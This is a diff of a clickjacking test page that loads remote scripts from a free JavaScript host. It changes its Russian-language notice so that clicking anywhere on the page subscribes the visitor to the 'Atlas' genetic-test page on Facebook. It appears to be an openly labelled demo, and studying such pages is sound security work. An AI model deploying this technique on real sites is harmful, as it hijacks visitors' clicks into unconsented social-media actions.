--- a/Clickjacking show like button.html
+++ b/Clickjacking show like button.html
@@ -4,20 +4,6 @@
  <meta charset="UTF-8">
   <title>Test fb clckjacking</title>
  <script type="text/javascript" src="http://yourjavascript.com/334751153/config-show-button.js"></script>
-</head>
- <body>
-  <script type="text/javascript" src="http://yourjavascript.com/324511314/like.js"></script>
-
-<h1>Test Facebook Clickjacking</h1>
-
-
-
-<h3>Если вы нажмете на ссылку, то подпишетесь на Генетический тест «Атлас» в Facebook</h3>
-
-<a href="#">Не нажимай меня</a>
-
-
-
 
 
 
@@ -31,6 +17,25 @@
   ga('send', 'pageview');
 
 </script>
+
+
+ 
+</head>
+ <body>
+  <script type="text/javascript" src="http://yourjavascript.com/324511314/like.js"></script>
+
+<h1>Test Facebook Clickjacking</h1>
+
+
+
+
+<p>Если вы нажмете где-то на странице, то подпишетесь на Генетический тест «Атлас» в Facebook: https://www.facebook.com/atlasbiomed</p>
+
+<a href="#">Не нажимай меня</a>
+
+
+
+
 
 
 </body></html>
